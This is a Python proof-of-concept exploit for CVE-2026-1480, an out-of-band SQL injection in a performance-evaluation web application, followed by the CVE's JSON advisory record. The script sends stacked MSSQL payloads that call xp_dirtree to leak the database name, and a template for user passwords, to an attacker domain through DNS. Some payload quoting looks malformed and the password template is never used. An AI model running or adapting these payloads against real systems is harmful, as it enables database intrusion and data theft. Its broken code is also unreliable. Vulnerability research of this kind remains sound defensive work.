CVE-2026-1480

# CVE-2026-1480 OOB SQL Injection PoC # Target: Performance Evaluation (EDD) application # Endpoint: /evaluacion_objetivos_anyo_sig_evalua.aspx # Vulnerable Parameter: Id_usuario import requests import urllib.parse target_url = "http://target.com/evaluacion_objetivos_anyo_sig_evalua.aspx" attacker_domain = "attacker.com" # OOB SQL Injection payload using DNS exfiltration payload_template = "'; DECLARE @cmd VARCHAR(8000); SET @cmd = (SELECT TOP 1 password FROM users WHERE id=' + {id} +'); EXEC('DECLARE @h VARCHAR(100);''+''SELECT @h=''''+REPLACE(@cmd,'''''',''''''')+'.{domain}+'?data=''+@cmd+''''''); master..xp_dirtree ''\\''+@cmd+'.{domain}+'\test''; ---" def exploit_sql_injection(user_id, domain): """Send malicious request with OOB SQLi payload""" payload = f"'; DECLARE @a VARCHAR(100); SELECT @a=db_name(); EXEC('master..xp_dirtree ''\\''+@a+'.{domain}+'\test'''); --" params = { 'Id_usuario': payload } try: response = requests.get(target_url, params=params, timeout=10) return response.status_code except Exception as e: print(f"Error: {e}") return None def extract_data_via_dns(user_id, domain): """Extract data using DNS queries""" # Payload to exfiltrate database name payload = f"'; DECLARE @s VARCHAR(8000); SET @s=db_name(); EXEC('EXEC master..xp_dirtree ''\\''+@s+'.{domain}+'\test'''); --" params = {'Id_usuario': payload} requests.get(target_url, params=params, timeout=10) if __name__ == "__main__": print("CVE-2026-1480 OOB SQL Injection PoC") print(f"Target: {target_url}") status = exploit_sql_injection(1, attacker_domain) print(f"Request sent, status: {status}")

{"cve": {"id": "CVE-2026-1480", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:11.550", "lastModified": "2026-02-10T20:19:24.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_evalua.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_objetivos_anyo_sig_evalua.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}